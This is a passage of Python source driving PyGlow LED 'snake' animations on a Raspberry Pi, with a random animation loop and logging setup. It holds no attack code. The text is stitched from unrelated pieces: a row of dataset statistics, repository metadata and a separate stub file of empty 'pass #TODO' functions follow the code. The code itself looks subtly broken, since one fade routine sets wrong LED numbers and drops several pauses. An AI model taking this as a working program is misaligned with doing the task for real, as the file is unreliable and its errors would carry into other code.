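# PYGLOW.led and a sleep(explode_speed) wrapper):
def explode_arms(set_led, pause, arm_a, arm_b):
    """Sketch: turn off two arms, alternating LEDs, centre first."""
    for led_a, led_b in zip(arm_a, arm_b):
        set_led(led_a, 0)
        pause()
        set_led(led_b, 0)
        pause()
# Under these assumptions,
# explode_arms(PYGLOW.led, lambda: sleep(0.020), [18, 17, 16, 15, 14, 13], [12, 5, 4, 3, 2, 1])
# should reproduce the call order of explode_snake_13_or_31 above.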
def slithering_fizzling_fading_snake_12():
"""
Lights up, pulses, then fizzles out the LEDs on arms 1 and 2
"""
LOGGER.debug("Snake 12 is slithering...")
sleep_speed = 0.10
# Light up Snake 12
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_12_or_21()
# Explode Snake 12
LOGGER.debug("Snake 12 is exploding...")
fizzling_snake_12_or_21()
def slithering_fizzling_fading_snake_13():
"""
Lights up, pulses, then fizzles out the LEDs on arms 1 and 3
"""
LOGGER.debug("Snake 13 is slithering...")
sleep_speed = 0.10
# Light up Snake 13
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_13_or_31()
# Explode Snake 13
LOGGER.debug("Snake 13 is exploding...")
fizzling_snake_13_or_31()
def slithering_fizzling_fading_snake_21():
"""
Lights up, pulses, then fizzles out the LEDs on arms 2 and 1
"""
LOGGER.debug("Snake 21 is slithering...")
sleep_speed = 0.10
# Light up Snake 21
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_12_or_21()
# Explode Snake 21
LOGGER.debug("Snake 21 is exploding...")
fizzling_snake_12_or_21()
def slithering_fizzling_fading_snake_23():
"""
Lights up, pulses, then fizzles out the LEDs on arms 2 and 3
"""
LOGGER.debug("Snake 23 is slithering...")
sleep_speed = 0.10
# Light up Snake 23
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_23_or_32()
# Explode Snake 23
LOGGER.debug("Snake 23 is exploding...")
fizzling_snake_23_or_32()
def slithering_fizzling_fading_snake_31():
"""
Lights up, pulses, then fizzles out the LEDs on arms 3 and 1
"""
LOGGER.debug("Snake 31 is slithering...")
sleep_speed = 0.10
# Light up Snake 31
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_13_or_31()
# Explode Snake 31
LOGGER.debug("Snake 31 is exploding...")
fizzling_snake_13_or_31()
def slithering_fizzling_fading_snake_32():
"""
Lights up, pulses, then fizzles out the LEDs on arms 3 and 2
"""
LOGGER.debug("Snake 32 is slithering...")
sleep_speed = 0.10
# Light up Snake 32
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Pulse
pulse_snake_23_or_32()
# Explode Snake 32
LOGGER.debug("Snake 32 is exploding...")
fizzling_snake_23_or_32()
def fizzling_snake_12_or_21():
"""
Fades the LEDs on arms 1 and 2
"""
explode_speed = 0.01
# Fade Body 5 (on both sides)
PYGLOW.led(18, 90)
sleep(explode_speed)
PYGLOW.led(6, 90)
sleep(explode_speed)
# Fade Body 5 and 4
PYGLOW.led(18, 80)
sleep(explode_speed)
PYGLOW.led(6, 80)
sleep(explode_speed)
PYGLOW.led(11, 90)
sleep(explode_speed)
PYGLOW.led(5, 90)
sleep(explode_speed)
# Fade Body 5 - 3
PYGLOW.led(18, 70)
sleep(explode_speed)
PYGLOW.led(6, 70)
sleep(explode_speed)
PYGLOW.led(11, 80)
sleep(explode_speed)
PYGLOW.led(5, 80)
sleep(explode_speed)
PYGLOW.led(10, 90)
sleep(explode_speed)
PYGLOW.led(4, 90)
sleep(explode_speed)
# Fade Body 5 - 2
PYGLOW.led(18, 60)
sleep(explode_speed)
PYGLOW.led(6, 60)
sleep(explode_speed)
PYGLOW.led(11, 70)
sleep(explode_speed)
PYGLOW.led(5, 70)
sleep(explode_speed)
PYGLOW.led(10, 80)
sleep(explode_speed)
PYGLOW.led(4, 80)
sleep(explode_speed)
PYGLOW.led(9, 90)
sleep(explode_speed)
PYGLOW.led(3, 90)
sleep(explode_speed)
# Fade Body 5 - 1
PYGLOW.led(18, 50)
sleep(explode_speed)
PYGLOW.led(6, 50)
sleep(explode_speed)
PYGLOW.led(11, 60)
sleep(explode_speed)
PYGLOW.led(5, 60)
sleep(explode_speed)
PYGLOW.led(10, 70)
sleep(explode_speed)
PYGLOW.led(4, 70)
sleep(explode_speed)
PYGLOW.led(9, 80)
sleep(explode_speed)
PYGLOW.led(3, 80)
sleep(explode_speed)
PYGLOW.led(8, 90)
sleep(explode_speed)
PYGLOW.led(2, 90)
sleep(explode_speed)
# Fade Body 5 - 1, Head and Tail
PYGLOW.led(18, 40)
sleep(explode_speed)
PYGLOW.led(6, 40)
sleep(explode_speed)
PYGLOW.led(11, 50)
sleep(explode_speed)
PYGLOW.led(5, 50)
sleep(explode_speed)
PYGLOW.led(10, 60)
sleep(explode_speed)
PYGLOW.led(4, 60)
sleep(explode_speed)
PYGLOW.led(9, 70)
sleep(explode_speed)
PYGLOW.led(3, 70)
sleep(explode_speed)
PYGLOW.led(8, 80)
sleep(explode_speed)
PYGLOW.led(2, 80)
sleep(explode_speed)
PYGLOW.led(7, 90)
sleep(explode_speed)
PYGLOW.led(1, 90)
sleep(explode_speed)
# Fade Body 5 - 1, Head and Tail
PYGLOW.led(18, 30)
sleep(explode_speed)
PYGLOW.led(6, 30)
sleep(explode_speed)
PYGLOW.led(11, 40)
sleep(explode_speed)
PYGLOW.led(5, 40)
sleep(explode_speed)
PYGLOW.led(10, 50)
sleep(explode_speed)
PYGLOW.led(4, 50)
sleep(explode_speed)
PYGLOW.led(9, 60)
sleep(explode_speed)
PYGLOW.led(3, 60)
sleep(explode_speed)
PYGLOW.led(8, 70)
sleep(explode_speed)
PYGLOW.led(2, 70)
sleep(explode_speed)
PYGLOW.led(7, 80)
sleep(explode_speed)
PYGLOW.led(1, 80)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 20)
sleep(explode_speed)
PYGLOW.led(6, 20)
sleep(explode_speed)
PYGLOW.led(11, 30)
sleep(explode_speed)
PYGLOW.led(5, 30)
sleep(explode_speed)
PYGLOW.led(10, 40)
sleep(explode_speed)
PYGLOW.led(4, 40)
sleep(explode_speed)
PYGLOW.led(9, 50)
sleep(explode_speed)
PYGLOW.led(3, 50)
sleep(explode_speed)
PYGLOW.led(8, 60)
sleep(explode_speed)
PYGLOW.led(2, 60)
sleep(explode_speed)
PYGLOW.led(7, 70)
sleep(explode_speed)
PYGLOW.led(1, 70)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 10)
sleep(explode_speed)
PYGLOW.led(6, 10)
sleep(explode_speed)
PYGLOW.led(11, 20)
sleep(explode_speed)
PYGLOW.led(5, 20)
sleep(explode_speed)
PYGLOW.led(10, 30)
sleep(explode_speed)
PYGLOW.led(4, 30)
sleep(explode_speed)
PYGLOW.led(9, 40)
sleep(explode_speed)
PYGLOW.led(3, 40)
sleep(explode_speed)
PYGLOW.led(8, 50)
sleep(explode_speed)
PYGLOW.led(2, 50)
sleep(explode_speed)
PYGLOW.led(7, 60)
sleep(explode_speed)
PYGLOW.led(1, 60)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 0)
sleep(explode_speed)
PYGLOW.led(6, 0)
sleep(explode_speed)
PYGLOW.led(11, 10)
sleep(explode_speed)
PYGLOW.led(5, 10)
sleep(explode_speed)
PYGLOW.led(10, 20)
sleep(explode_speed)
PYGLOW.led(4, 20)
sleep(explode_speed)
PYGLOW.led(9, 30)
sleep(explode_speed)
PYGLOW.led(3, 30)
sleep(explode_speed)
PYGLOW.led(8, 40)
sleep(explode_speed)
PYGLOW.led(2, 40)
sleep(explode_speed)
PYGLOW.led(7, 50)
sleep(explode_speed)
PYGLOW.led(1, 50)
sleep(explode_speed)
# Fade Body 4 -1, Head and Tail
PYGLOW.led(11, 0)
sleep(explode_speed)
PYGLOW.led(5, 0)
sleep(explode_speed)
PYGLOW.led(10, 10)
sleep(explode_speed)
PYGLOW.led(4, 10)
sleep(explode_speed)
PYGLOW.led(9, 20)
sleep(explode_speed)
PYGLOW.led(3, 20)
sleep(explode_speed)
PYGLOW.led(8, 30)
sleep(explode_speed)
PYGLOW.led(2, 30)
sleep(explode_speed)
PYGLOW.led(7, 40)
sleep(explode_speed)
PYGLOW.led(1, 40)
sleep(explode_speed)
# Fade Body 3 -1, Head and Tail
PYGLOW.led(10, 0)
sleep(explode_speed)
PYGLOW.led(4, 0)
sleep(explode_speed)
PYGLOW.led(9, 10)
sleep(explode_speed)
PYGLOW.led(3, 10)
sleep(explode_speed)
PYGLOW.led(8, 20)
sleep(explode_speed)
PYGLOW.led(2, 20)
sleep(explode_speed)
PYGLOW.led(7, 30)
sleep(explode_speed)
PYGLOW.led(1, 30)
sleep(explode_speed)
# Fade Body 2 - 1, Head and Tail
PYGLOW.led(9, 0)
sleep(explode_speed)
PYGLOW.led(3, 0)
sleep(explode_speed)
PYGLOW.led(8, 10)
sleep(explode_speed)
PYGLOW.led(2, 10)
sleep(explode_speed)
PYGLOW.led(7, 20)
sleep(explode_speed)
PYGLOW.led(1, 20)
sleep(explode_speed)
# Fade Body 1, Head and Tail
PYGLOW.led(8, 0)
sleep(explode_speed)
PYGLOW.led(2, 0)
sleep(explode_speed)
PYGLOW.led(7, 10)
sleep(explode_speed)
PYGLOW.led(1, 10)
sleep(explode_speed)
# Fade Head and Tail
PYGLOW.led(7, 0)
sleep(explode_speed)
PYGLOW.led(1, 0)
sleep(explode_speed)
def fizzling_snake_13_or_31():
"""
Fades the LEDs on arms 1 and 3
"""
explode_speed = 0.01
# Fade Body 5 (on both sides)
PYGLOW.led(18, 90)
sleep(explode_speed)
PYGLOW.led(12, 90)
sleep(explode_speed)
# Fade Body 5 and 4
PYGLOW.led(18, 80)
sleep(explode_speed)
PYGLOW.led(12, 80)
sleep(explode_speed)
PYGLOW.led(17, 90)
sleep(explode_speed)
PYGLOW.led(5, 90)
# Fade Body 5 - 3
PYGLOW.led(18, 70)
sleep(explode_speed)
PYGLOW.led(12, 70)
sleep(explode_speed)
PYGLOW.led(17, 80)
sleep(explode_speed)
PYGLOW.led(5, 80)
sleep(explode_speed)
PYGLOW.led(16, 90)
sleep(explode_speed)
PYGLOW.led(4, 90)
# Fade Body 5 - 2
PYGLOW.led(18, 60)
sleep(explode_speed)
PYGLOW.led(12, 60)
sleep(explode_speed)
PYGLOW.led(17, 70)
sleep(explode_speed)
PYGLOW.led(5, 70)
sleep(explode_speed)
PYGLOW.led(16, 80)
sleep(explode_speed)
PYGLOW.led(4, 80)
sleep(explode_speed)
PYGLOW.led(15, 90)
sleep(explode_speed)
PYGLOW.led(3, 90)
# Fade Body 5 - 1
PYGLOW.led(18, 50)
sleep(explode_speed)
PYGLOW.led(12, 50)
sleep(explode_speed)
PYGLOW.led(17, 60)
sleep(explode_speed)
PYGLOW.led(5, 60)
sleep(explode_speed)
PYGLOW.led(16, 70)
sleep(explode_speed)
PYGLOW.led(4, 70)
sleep(explode_speed)
PYGLOW.led(15, 80)
sleep(explode_speed)
PYGLOW.led(3, 80)
sleep(explode_speed)
PYGLOW.led(14, 90)
sleep(explode_speed)
PYGLOW.led(2, 90)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 40)
sleep(explode_speed)
PYGLOW.led(12, 40)
sleep(explode_speed)
PYGLOW.led(17, 50)
sleep(explode_speed)
PYGLOW.led(5, 50)
sleep(explode_speed)
PYGLOW.led(16, 60)
sleep(explode_speed)
PYGLOW.led(4, 60)
sleep(explode_speed)
PYGLOW.led(15, 70)
sleep(explode_speed)
PYGLOW.led(3, 70)
sleep(explode_speed)
PYGLOW.led(4, 80)
sleep(explode_speed)
PYGLOW.led(2, 80)
sleep(explode_speed)
PYGLOW.led(3, 90)
sleep(explode_speed)
PYGLOW.led(1, 90)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 30)
sleep(explode_speed)
PYGLOW.led(12, 30)
sleep(explode_speed)
PYGLOW.led(17, 40)
sleep(explode_speed)
PYGLOW.led(5, 40)
sleep(explode_speed)
PYGLOW.led(16, 50)
sleep(explode_speed)
PYGLOW.led(4, 50)
sleep(explode_speed)
PYGLOW.led(15, 60)
sleep(explode_speed)
PYGLOW.led(3, 60)
sleep(explode_speed)
PYGLOW.led(14, 70)
sleep(explode_speed)
PYGLOW.led(2, 70)
sleep(explode_speed)
PYGLOW.led(13, 80)
sleep(explode_speed)
PYGLOW.led(1, 80)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 20)
sleep(explode_speed)
PYGLOW.led(2, 20)
sleep(explode_speed)
PYGLOW.led(17, 30)
sleep(explode_speed)
PYGLOW.led(5, 30)
sleep(explode_speed)
PYGLOW.led(16, 40)
sleep(explode_speed)
PYGLOW.led(4, 40)
sleep(explode_speed)
PYGLOW.led(15, 50)
sleep(explode_speed)
PYGLOW.led(3, 50)
sleep(explode_speed)
PYGLOW.led(14, 60)
sleep(explode_speed)
PYGLOW.led(2, 60)
sleep(explode_speed)
PYGLOW.led(13, 70)
sleep(explode_speed)
PYGLOW.led(1, 70)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 10)
sleep(explode_speed)
PYGLOW.led(12, 10)
sleep(explode_speed)
PYGLOW.led(17, 20)
sleep(explode_speed)
PYGLOW.led(5, 20)
sleep(explode_speed)
PYGLOW.led(16, 30)
sleep(explode_speed)
PYGLOW.led(4, 30)
sleep(explode_speed)
PYGLOW.led(15, 40)
sleep(explode_speed)
PYGLOW.led(3, 40)
sleep(explode_speed)
PYGLOW.led(14, 50)
sleep(explode_speed)
PYGLOW.led(2, 50)
sleep(explode_speed)
PYGLOW.led(3, 60)
sleep(explode_speed)
PYGLOW.led(1, 60)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(18, 0)
sleep(explode_speed)
PYGLOW.led(12, 0)
sleep(explode_speed)
PYGLOW.led(17, 10)
sleep(explode_speed)
PYGLOW.led(5, 10)
sleep(explode_speed)
PYGLOW.led(16, 20)
sleep(explode_speed)
PYGLOW.led(4, 20)
sleep(explode_speed)
PYGLOW.led(15, 30)
sleep(explode_speed)
PYGLOW.led(3, 30)
sleep(explode_speed)
PYGLOW.led(14, 40)
sleep(explode_speed)
PYGLOW.led(2, 40)
sleep(explode_speed)
PYGLOW.led(13, 50)
sleep(explode_speed)
PYGLOW.led(1, 50)
sleep(explode_speed)
# Fade Body 4 -1, Head and Tail
PYGLOW.led(17, 0)
sleep(explode_speed)
PYGLOW.led(5, 0)
sleep(explode_speed)
PYGLOW.led(16, 10)
sleep(explode_speed)
PYGLOW.led(4, 10)
sleep(explode_speed)
PYGLOW.led(15, 20)
sleep(explode_speed)
PYGLOW.led(3, 20)
sleep(explode_speed)
PYGLOW.led(14, 30)
sleep(explode_speed)
PYGLOW.led(2, 30)
sleep(explode_speed)
PYGLOW.led(13, 40)
sleep(explode_speed)
PYGLOW.led(1, 40)
sleep(explode_speed)
# Fade Body 3 -1, Head and Tail
PYGLOW.led(16, 0)
sleep(explode_speed)
PYGLOW.led(4, 0)
sleep(explode_speed)
PYGLOW.led(15, 10)
sleep(explode_speed)
PYGLOW.led(3, 10)
sleep(explode_speed)
PYGLOW.led(14, 20)
sleep(explode_speed)
PYGLOW.led(2, 20)
sleep(explode_speed)
PYGLOW.led(13, 30)
sleep(explode_speed)
PYGLOW.led(1, 30)
sleep(explode_speed)
# Fade Body 2 - 1, Head and Tail
PYGLOW.led(15, 0)
sleep(explode_speed)
PYGLOW.led(3, 0)
sleep(explode_speed)
PYGLOW.led(14, 10)
sleep(explode_speed)
PYGLOW.led(2, 10)
sleep(explode_speed)
PYGLOW.led(13, 20)
sleep(explode_speed)
PYGLOW.led(1, 20)
sleep(explode_speed)
# Fade Body 1, Head and Tail
PYGLOW.led(14, 0)
sleep(explode_speed)
PYGLOW.led(2, 0)
sleep(explode_speed)
PYGLOW.led(13, 10)
sleep(explode_speed)
PYGLOW.led(1, 10)
sleep(explode_speed)
# Fade Head and Tail
PYGLOW.led(13, 0)
sleep(explode_speed)
PYGLOW.led(1, 0)
sleep(explode_speed)
def fizzling_snake_23_or_32():
"""
Fades the LEDs on arms 2 and 3
"""
explode_speed = 0.01
# Fade Body 5 (on both sides)
PYGLOW.led(12, 90)
sleep(explode_speed)
PYGLOW.led(6, 90)
sleep(explode_speed)
# Fade Body 5 and 4
PYGLOW.led(12, 80)
sleep(explode_speed)
PYGLOW.led(6, 80)
sleep(explode_speed)
PYGLOW.led(17, 90)
sleep(explode_speed)
PYGLOW.led(11, 90)
# Fade Body 5 - 3
PYGLOW.led(12, 70)
sleep(explode_speed)
PYGLOW.led(6, 70)
sleep(explode_speed)
PYGLOW.led(17, 80)
sleep(explode_speed)
PYGLOW.led(11, 80)
sleep(explode_speed)
PYGLOW.led(16, 90)
sleep(explode_speed)
PYGLOW.led(10, 90)
# Fade Body 5 - 2
PYGLOW.led(12, 60)
sleep(explode_speed)
PYGLOW.led(6, 60)
sleep(explode_speed)
PYGLOW.led(17, 70)
sleep(explode_speed)
PYGLOW.led(11, 70)
sleep(explode_speed)
PYGLOW.led(16, 80)
sleep(explode_speed)
PYGLOW.led(10, 80)
sleep(explode_speed)
PYGLOW.led(15, 90)
sleep(explode_speed)
PYGLOW.led(9, 90)
# Fade Body 5 - 1
PYGLOW.led(12, 50)
sleep(explode_speed)
PYGLOW.led(6, 50)
sleep(explode_speed)
PYGLOW.led(17, 60)
sleep(explode_speed)
PYGLOW.led(11, 60)
sleep(explode_speed)
PYGLOW.led(16, 70)
sleep(explode_speed)
PYGLOW.led(10, 70)
sleep(explode_speed)
PYGLOW.led(15, 80)
sleep(explode_speed)
PYGLOW.led(9, 80)
sleep(explode_speed)
PYGLOW.led(14, 90)
sleep(explode_speed)
PYGLOW.led(8, 90)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(12, 40)
sleep(explode_speed)
PYGLOW.led(6, 40)
sleep(explode_speed)
PYGLOW.led(17, 50)
sleep(explode_speed)
PYGLOW.led(11, 50)
sleep(explode_speed)
PYGLOW.led(16, 60)
sleep(explode_speed)
PYGLOW.led(10, 60)
sleep(explode_speed)
PYGLOW.led(15, 70)
sleep(explode_speed)
PYGLOW.led(9, 70)
sleep(explode_speed)
PYGLOW.led(14, 80)
sleep(explode_speed)
PYGLOW.led(8, 80)
sleep(explode_speed)
PYGLOW.led(13, 90)
sleep(explode_speed)
PYGLOW.led(7, 90)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(12, 30)
sleep(explode_speed)
PYGLOW.led(6, 30)
sleep(explode_speed)
PYGLOW.led(17, 40)
sleep(explode_speed)
PYGLOW.led(11, 40)
sleep(explode_speed)
PYGLOW.led(16, 50)
sleep(explode_speed)
PYGLOW.led(10, 50)
sleep(explode_speed)
PYGLOW.led(15, 60)
sleep(explode_speed)
PYGLOW.led(9, 60)
sleep(explode_speed)
PYGLOW.led(14, 70)
sleep(explode_speed)
PYGLOW.led(8, 70)
sleep(explode_speed)
PYGLOW.led(13, 80)
sleep(explode_speed)
PYGLOW.led(7, 80)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(12, 20)
sleep(explode_speed)
PYGLOW.led(6, 20)
sleep(explode_speed)
PYGLOW.led(17, 30)
sleep(explode_speed)
PYGLOW.led(11, 30)
sleep(explode_speed)
PYGLOW.led(16, 40)
sleep(explode_speed)
PYGLOW.led(10, 40)
sleep(explode_speed)
PYGLOW.led(15, 50)
sleep(explode_speed)
PYGLOW.led(9, 50)
sleep(explode_speed)
PYGLOW.led(14, 60)
sleep(explode_speed)
PYGLOW.led(8, 60)
sleep(explode_speed)
PYGLOW.led(13, 70)
sleep(explode_speed)
PYGLOW.led(7, 70)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(12, 10)
sleep(explode_speed)
PYGLOW.led(6, 10)
sleep(explode_speed)
PYGLOW.led(17, 20)
sleep(explode_speed)
PYGLOW.led(11, 20)
sleep(explode_speed)
PYGLOW.led(16, 30)
sleep(explode_speed)
PYGLOW.led(10, 30)
sleep(explode_speed)
PYGLOW.led(15, 40)
sleep(explode_speed)
PYGLOW.led(9, 40)
sleep(explode_speed)
PYGLOW.led(14, 50)
sleep(explode_speed)
PYGLOW.led(8, 50)
sleep(explode_speed)
PYGLOW.led(13, 60)
sleep(explode_speed)
PYGLOW.led(7, 60)
sleep(explode_speed)
# Fade Body 5 -1, Head and Tail
PYGLOW.led(12, 0)
sleep(explode_speed)
PYGLOW.led(6, 0)
sleep(explode_speed)
PYGLOW.led(17, 10)
sleep(explode_speed)
PYGLOW.led(11, 10)
sleep(explode_speed)
PYGLOW.led(16, 20)
sleep(explode_speed)
PYGLOW.led(10, 20)
sleep(explode_speed)
PYGLOW.led(15, 30)
sleep(explode_speed)
PYGLOW.led(9, 30)
sleep(explode_speed)
PYGLOW.led(14, 40)
sleep(explode_speed)
PYGLOW.led(8, 40)
sleep(explode_speed)
PYGLOW.led(13, 50)
sleep(explode_speed)
PYGLOW.led(7, 50)
sleep(explode_speed)
# Fade Body 4 -1, Head and Tail
PYGLOW.led(17, 0)
sleep(explode_speed)
PYGLOW.led(11, 0)
sleep(explode_speed)
PYGLOW.led(16, 10)
sleep(explode_speed)
PYGLOW.led(10, 10)
sleep(explode_speed)
PYGLOW.led(15, 20)
sleep(explode_speed)
PYGLOW.led(9, 20)
sleep(explode_speed)
PYGLOW.led(14, 30)
sleep(explode_speed)
PYGLOW.led(8, 30)
sleep(explode_speed)
PYGLOW.led(13, 40)
sleep(explode_speed)
PYGLOW.led(7, 40)
sleep(explode_speed)
# Fade Body 3 -1, Head and Tail
PYGLOW.led(16, 0)
sleep(explode_speed)
PYGLOW.led(10, 0)
sleep(explode_speed)
PYGLOW.led(15, 10)
sleep(explode_speed)
PYGLOW.led(9, 10)
sleep(explode_speed)
PYGLOW.led(14, 20)
sleep(explode_speed)
PYGLOW.led(8, 20)
sleep(explode_speed)
PYGLOW.led(13, 30)
sleep(explode_speed)
PYGLOW.led(7, 30)
sleep(explode_speed)
# Fade Body 2 - 1, Head and Tail
PYGLOW.led(15, 0)
sleep(explode_speed)
PYGLOW.led(9, 0)
sleep(explode_speed)
PYGLOW.led(14, 10)
sleep(explode_speed)
PYGLOW.led(8, 10)
sleep(explode_speed)
PYGLOW.led(13, 20)
sleep(explode_speed)
PYGLOW.led(7, 20)
sleep(explode_speed)
# Fade Body 1, Head and Tail
PYGLOW.led(14, 0)
sleep(explode_speed)
PYGLOW.led(8, 0)
sleep(explode_speed)
PYGLOW.led(13, 10)
sleep(explode_speed)
PYGLOW.led(7, 10)
sleep(explode_speed)
# Fade Head and Tail
PYGLOW.led(13, 0)
sleep(explode_speed)
PYGLOW.led(7, 0)
sleep(explode_speed)
def main():
"""
The main function
"""
LOGGER.debug("START")
snake_functions = [snake_12, snake_13, snake_23, fading_snake_12,
fading_snake_13, fading_snake_23, slithering_snake_12,
slithering_snake_13, slithering_snake_21,
slithering_snake_23, slithering_snake_31,
slithering_snake_32, slithering_fading_snake_12,
slithering_fading_snake_13, slithering_fading_snake_21,
slithering_fading_snake_23, slithering_fading_snake_31,
slithering_fading_snake_32, pulsing_snake_12,
pulsing_snake_13, pulsing_snake_23, exploding_snake_12,
exploding_snake_13, exploding_snake_23,
slithering_exploding_snake_12,
slithering_exploding_snake_13,
slithering_exploding_snake_21,
slithering_exploding_snake_23,
slithering_exploding_snake_31,
slithering_exploding_snake_32,
slithering_fizzling_fading_snake_12,
slithering_fizzling_fading_snake_13,
slithering_fizzling_fading_snake_21,
slithering_fizzling_fading_snake_23,
slithering_fizzling_fading_snake_31,
slithering_fizzling_fading_snake_32]
while True:
random.choice(snake_functions)()
sleep(2)
if __name__ == '__main__':
try:
# STEP01: Check if Log directory exists.
check_log_directory()
# STEP02: Enable logging
LOG = 'Logs/random_snakes.log'
LOG_FORMAT = '%(asctime)s %(name)s: %(funcName)s: \
%(levelname)s: %(message)s'
LOGGER = logging.getLogger(__name__)
# Nothing will log unless logging level is changed to DEBUG
LOGGER.setLevel(logging.ERROR)
FORMATTER = logging.Formatter(fmt=LOG_FORMAT,
datefmt='%m/%d/%y %I:%M:%S %p:')
FILE_HANDLER = logging.FileHandler(LOG, 'w')
FILE_HANDLER.setFormatter(FORMATTER)
LOGGER.addHandler(FILE_HANDLER)
# STEP03: Print header
print_header()
# STEP04: Print instructions in white text
print("\033[1;37;40mPress Ctrl-C to stop the program.")
# STEP05: Run the main function
main()
except KeyboardInterrupt:
delete_empty_logs(LOG)
stop()
| 23.746572 | 79 | 0.624385 | 15,973 | 103,915 | 3.916234 | 0.012396 | 0.239121 | 0.306839 | 0.332353 | 0.972568 | 0.966525 | 0.961681 | 0.957173 | 0.955015 | 0.951786 | 0 | 0.099022 | 0.25237 | 103,915 | 4,375 | 80 | 23.752 | 0.706153 | 0.117009 | 0 | 0.954906 | 0 | 0 | 0.014432 | 0.000244 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012572 | false | 0 | 0.002186 | 0 | 0.014758 | 0.00082 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
cca5a7d49a7e41a6dbea4effdd7657195c648384 | 113 | py | Python | utility/utility.py | ericlee0803/surrogate-GCP | 0d04355bf17dc330b383353b51a62a28276de063 | [
"BSD-3-Clause"
] | null | null | null | utility/utility.py | ericlee0803/surrogate-GCP | 0d04355bf17dc330b383353b51a62a28276de063 | [
"BSD-3-Clause"
] | null | null | null | utility/utility.py | ericlee0803/surrogate-GCP | 0d04355bf17dc330b383353b51a62a28276de063 | [
"BSD-3-Clause"
] | null | null | null | def utility(list):
pass #TODO
def getinitState():
pass #TODO
def getnextStates(state):
pass #TODO
